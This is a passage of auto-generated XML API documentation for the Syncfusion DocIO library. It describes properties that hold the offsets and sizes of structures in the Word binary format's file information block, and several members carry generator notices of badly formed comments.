        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlrsid">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A PLRSID begins at this offset.
            If lcbPlrsid is zero, fcPlrsid is undefined and MUST be ignored.
            </summary>
            <value>
            The fc plrsid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlrsid">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PLRSID at offset fcPlrsid in the Table Stream.
            </summary>
            <value>
            The LCB plrsid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcSttbfBkmkFactoid">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An SttbfBkmkFactoid containing
            information about smart tag bookmarks in the document begins at this offset. If lcbSttbfBkmkFactoid is zero, 
            fcSttbfBkmkFactoid is undefined and MUST be ignored.
            </summary>
            <value>
            The fc STTBF BKMK factoid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbSttbfBkmkFactoid">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the SttbfBkmkFactoid at offset fcSttbfBkmkFactoid.
            </summary>
            <value>
            The LCB STTBF BKMK factoid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfBkfFactoid">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfBkfd that contains
            information about the smart tag bookmarks in the document begins at this offset. If lcbPlcfBkfFactoid is zero, 
            fcPlcfBkfFactoid is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKF factoid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfBkfFactoid">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlcfBkfd at offset fcPlcfBkfFactoid.
            </summary>
            <value>
            The LCB PLCF BKF factoid.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfcookie" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfcookie">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the Plcfcookie at offset fcPlcfcookie in the Table Stream.
            </summary>
            <value>
            The LCB plcfcookie.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfBklFactoid">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A Plcfbkld that contains 
            information about the smart tag bookmarks in the document begins at this offset. If lcbPlcfBklFactoid is zero, 
            fcPlcfBklFactoid is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKL factoid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfBklFactoid">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the Plcfbkld at offset fcPlcfBklFactoid.
            </summary>
            <value>
            The LCB PLCF BKL factoid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcFactoidData">
            <summary>
            Gets or sets  An unsigned integer that specifies an offset in the Table Stream. A SmartTagData begins 
            at this offset and specifies information about the smart tag recognizers that are used in this document. 
            If lcbFactoidData is zero, fcFactoidData is undefined and MUST be ignored.
            </summary>
            <value>
            The fc factoid data.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbFactoidData">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the SmartTagData at offset fcFactoidData in the Table Stream.
            </summary>
            <value>
            The LCB factoid data.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcDocUndo" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbDocUndo">
            <summary>
            Gets or sets An unsigned integer. If this value is nonzero, version-specific undo information exists at offset fcDocUndo in the WordDocument Stream.
            </summary>
            <value>
            The LCB document undo.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcSttbfBkmkFcc">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. An SttbfBkmkFcc that contains
            information about the format consistency-checker bookmarks in the document begins at this offset.
            If lcbSttbfBkmkFcc is zero, fcSttbfBkmkFcc is undefined and MUST be ignored.
            </summary>
            <value>
            The fc STTBF BKMK FCC.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbSttbfBkmkFcc">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the SttbfBkmkFcc at offset fcSttbfBkmkFcc.
            </summary>
            <value>
            The LCB STTBF BKMK FCC.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfBkfFcc">
            <summary>
            Gets or sets  An unsigned integer that specifies an offset in the Table Stream. A PlcfBkfd that contains
            information about format consistency-checker bookmarks in the document begins at this offset. If lcbPlcfBkfFcc is zero, 
            fcPlcfBkfFcc is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKF FCC.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfBkfFcc">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlcfBkfd at offset fcPlcfBkfFcc.
            </summary>
            <value>
            The LCB PLCF BKF FCC.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfBklFcc">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A PlcfBkld that contains information
            about the format consistency-checker bookmarks in the document begins at this offset. If lcbPlcfBklFcc is zero,
            fcPlcfBklFcc is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKL FCC.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfBklFcc">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlcfBkld at offset fcPlcfBklFcc.
            </summary>
            <value>
            The LCB PLCF BKL FCC.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcSttbfbkmkBPRepairs">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. An SttbfBkmkBPRepairs
            that contains information about the repair bookmarks in the document begins at this offset. If lcbSttbfBkmkBPRepairs 
            is zero, fcSttbfBkmkBPRepairs is undefined and MUST be ignored.
            </summary>
            <value>
            The fc STTBFBKMK bp repairs.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbSttbfbkmkBPRepairs">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the SttbfBkmkBPRepairs at offset fcSttbfBkmkBPRepairs.
            </summary>
            <value>
            The LCB STTBFBKMK bp repairs.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfbkfBPRepairs">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A PlcfBkf that contains 
            information about the repair bookmarks in the document begins at this offset. If lcbPlcfBkfBPRepairs is zero,
            fcPlcfBkfBPRepairs is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCFBKF bp repairs.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfbkfBPRepairs">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlcfBkf at offset fcPlcfbkfBPRepairs.
            </summary>
            <value>
            The LCB PLCFBKF bp repairs.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfbklBPRepairs">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A PlcfBkl that contains
            information about the repair bookmarks in the document begins at this offset. If lcbPlcfBklBPRepairs is zero, 
            fcPlcfBklBPRepairs is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCFBKL bp repairs.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfbklBPRepairs">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlcfBkl at offset fcPlcfBklBPRepairs.
            </summary>
            <value>
            The LCB PLCFBKL bp repairs.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPmsNew">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A new Pms, which contains
            the current state of a print merge operation, begins at this offset. If lcbPmsNew is zero, fcPmsNew is 
            undefined and MUST be ignored.
            </summary>
            <value>
            The fc PMS new.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPmsNew">
            <summary>
            Gets or sets an unsigned integer which specifies the size, in bytes, of the Pms at offset fcPmsNew.
            </summary>
            <value>
            The LCB PMS new.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcODSO">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. Office Data Source Object 
            (ODSO) data that is used to perform mail merge begins at this offset. The data is stored in an array of
            ODSOPropertyBase items. The ODSOPropertyBase items are of variable size and are stored contiguously. 
            The complete set of properties that are contained in the array is determined by reading each ODSOPropertyBase,
            until a total of lcbODSO bytes of data are read. If lcbODSO is zero, fcODSO is undefined and MUST be ignored.
            </summary>
            <value>
            The fc odso.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbODSO">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the Office Data Source Object data 
            at offset fcODSO in the Table Stream.
            </summary>
            <value>
            The LCB odso.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfpmiOldXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfpmiOldXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfpmiNewXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfpmiNewXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcfpmiMixedXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcfpmiMixedXP" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcUnused2">
            <summary>
            Gets or sets the fc unused2.This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc unused2.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbUnused2">
            <summary>
            Gets or sets the LCB unused2.This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused2.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcffactoid">
            <summary>
            Gets or sets an unsigned integer that specifies an offset in the Table Stream. A Plcffactoid, which specifies
            the smart tag recognizer state of each text range, begins at this offset. If lcbPlcffactoid is zero, fcPlcffactoid
            is undefined and MUST be ignored.
            </summary>
            <value>
            The fc plcffactoid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcffactoid">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes of the Plcffactoid that begins at offset 
            fcPlcffactoid in the Table Stream.
            </summary>
            <value>
            The LCB plcffactoid.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcflvcOldXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcflvcOldXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcflvcNewXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcflvcNewXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002FcPlcflvcMixedXP" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2002LcbPlcflvcMixedXP" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcHplxsdr">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An Hplxsdr structure begins 
            at this offset. This structure specifies information about XML schema definition references.
            </summary>
            <value>
            The fc HPLXSDR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbHplxsdr">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the Hplxsdr structure at the offset 
            fcHplxsdr in the Table Stream. If lcbHplxsdr is zero, then fcHplxsdr is undefined and MUST be ignored.
             </summary>
             <value>
             The LCB HPLXSDR.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcSttbfBkmkSdt">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. An SttbfBkmkSdt that contains 
            information about the structured document tag bookmarks in the document begins at this offset. If lcbSttbfBkmkSdt is zero, then fcSttbfBkmkSdt is undefined and MUST be ignored.
             </summary>
             <value>
             The fc STTBF BKMK SDT.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbSttbfBkmkSdt">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbfBkmkSdt at offset 
            fcSttbfBkmkSdt.
             </summary>
             <value>
             The LCB STTBF BKMK SDT.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcfBkfSdt">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcBkfd that contains 
            information about the structured document tag bookmarks in the document begins at this offset. If 
            lcbPlcfBkfSdt is zero, fcPlcfBkfSdt is undefined and MUST be ignored.
             </summary>
             <value>
             The fc PLCF BKF SDT.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcfBkfSdt">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcBkfd at offset fcPlcfBkfSdt.
            </summary>
            <value>
            The LCB PLCF BKF SDT.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcfBklSdt">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcBkld that contains 
            information about the structured document tag bookmarks in the document begins at this offset. If 
            lcbPlcfBklSdt is zero, fcPlcfBklSdt is undefined and MUST be ignored.
             </summary>
             <value>
             The fc PLCF BKL SDT.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcfBklSdt">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcBkld at offset fcPlcfBklSdt.
            </summary>
            <value>
            The LCB PLCF BKL SDT.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcCustomXForm">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. An array of 16-bit Unicode 
            characters, which specifies the full path and file name of the XML Stylesheet to apply when saving this 
            document in XML format, begins at this offset. If lcbCustomXForm is zero, fcCustomXForm is undefined and MUST
             be ignored.
             </summary>
             <value>
             The fc custom x form.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbCustomXForm">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the array at offset fcCustomXForm in 
            the Table Stream. This value MUST be less than or equal to 4168 and MUST be evenly divisible by two.
             </summary>
             <value>
             The LCB custom x form.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcSttbfBkmkProt">
             <summary>
             Gets or sets an unsigned integer that specifies an offset in the Table Stream. An SttbfBkmkProt that 
            contains information about range-level protection bookmarks in the document begins at this offset. If 
            lcbSttbfBkmkProt is zero, fcSttbfBkmkProt is undefined and MUST be ignored.
             </summary>
             <value>
             The fc STTBF BKMK prot.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbSttbfBkmkProt">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the SttbfBkmkProt at offset 
            fcSttbfBkmkProt.
             </summary>
             <value>
             The LCB STTBF BKMK prot.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcfBkfProt">
             <summary>
             Gets or sets an unsigned integer that specifies an offset in the Table Stream. A PlcBkf that contains 
            information about range-level protection bookmarks in the document begins at this offset. If lcbPlcfBkfProt 
            is zero, then fcPlcfBkfProt is undefined and MUST be ignored.
             </summary>
             <value>
             The fc PLCF BKF prot.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcfBkfProt">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlcBkf at offset fcPlcfBkfProt.
            </summary>
            <value>
            The LCB PLCF BKF prot.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcfBklProt">
             <summary>
             Gets or sets an unsigned integer that specifies an offset in the Table Stream. A PlcBkl containing 
            information about range-level protection bookmarks in the document begins at this offset. If lcbPlcfBklProt 
            is zero, then fcPlcfBklProt is undefined and MUST be ignored.
             </summary>
             <value>
             The fc PLCF BKL prot.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcfBklProt">
            <summary>
            Gets or sets an unsigned integer that specifies the size, in bytes, of the PlcBkl at offset fcPlcfBklProt.
            </summary>
            <value>
            The LCB PLCF BKL prot.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcSttbProtUser">
             <summary>
             Gets or sets an unsigned integer that specifies an offset in the Table Stream. A SttbProtUser that specifies
            the usernames that are used for range-level protection begins at this offset.
             </summary>
             <value>
             The fc STTB prot user.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbSttbProtUser">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the SttbProtUser at the offset 
            fcSttbProtUser.
             </summary>
             <value>
             The LCB STTB prot user.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcUnused">
            <summary>
            Gets or sets this value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The fc unused.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbUnused">
            <summary>
            Gets or sets this value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcfpmiOld" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcfpmiOld" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcfpmiOldInline" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcfpmiOldInline" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcfpmiNew" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcfpmiNew" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcfpmiNewInline" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcfpmiNewInline" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcflvcOld" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcflvcOld" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcflvcOldInline" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcflvcOldInline" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcflvcNew" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcflvcNew" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPlcflvcNewInline" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPlcflvcNewInline" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPgdMother">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated document page layout 
            cache at offset fcPgdMother in the Table Stream.
             </summary>
             <value>
             The fc PGD mother.
             </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPgdMother" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcBkdMother">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated document text flow 
            break cache at offset fcBkdMother in the Table Stream.
             </summary>
             <value>
             The fc BKD mother.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbBkdMother">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated document text flow 
            break cache at offset fcBkdMother in the Table Stream.
             </summary>
             <value>
             The LCB BKD mother.
             </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcAfdMother" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbAfdMother">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated document author filter
            cache at offset fcAfdMother in the Table Stream.
             </summary>
             <value>
             The LCB afd mother.
             </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPgdFtn" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPgdFtn">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated footnote layout cache 
            at offset fcPgdFtn in the Table Stream.
             </summary>
             <value>
             The LCB PGD FTN.
             </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcBkdFtn" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbBkdFtn">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated footnote text flow 
            break cache at offset fcBkdFtn in the Table Stream.
             </summary>
             <value>
             The LCB BKD FTN.
             </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcAfdFtn" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbAfdFtn">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated footnote author filter
            cache at offset fcAfdFtn in the Table Stream.
             </summary>
             <value>
             The LCB afd FTN.
             </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcPgdEdn" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbPgdEdn">
             <summary>
             Gets or sets an unsigned integer that specifies the size, in bytes, of the deprecated endnote layout cache 
            at offset fcPgdEdn in the Table Stream.
             </summary>
             <value>
             The LCB PGD edn.
             </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcBkdEdn" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbBkdEdn">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated endnote text flow 
            break cache at offset fcBkdEdn in the Table Stream.
             </summary>
             <value>
             The LCB BKD edn.
             </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcAfdEdn" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbAfdEdn">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated endnote author filter
            cache at offset fcAfdEdn in the Table Stream.
            </summary>
            <value>
            The LCB afd edn.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003FcAfd" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2003LcbAfd">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the deprecated AFD structure at 
            offset fcAfd in the Table Stream.
             </summary>
             <value>
             The LCB afd.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcPlcfmthd">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCFMTHD.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbPlcfmthd">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB PLCFMTHD.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcSttbfBkmkMoveFrom">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc STTBF BKMK move from.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbSttbfBkmkMoveFrom">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB STTBF BKMK move from.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcPlcfBkfMoveFrom">
            <summary>
            Gets or sets This value is undefined and MUST be ignored
            </summary>
            <value>
            The fc PLCF BKF move from.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbPlcfBkfMoveFrom">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB PLCF BKF move from.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcPlcfBklMoveFrom">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKL move from.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbPlcfBklMoveFrom">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB PLCF BKL move from.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcSttbfBkmkMoveTo">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc STTBF BKMK move to.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbSttbfBkmkMoveTo">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB STTBF BKMK move to.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcPlcfBkfMoveTo">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKF move to.
            </value>
        </member>
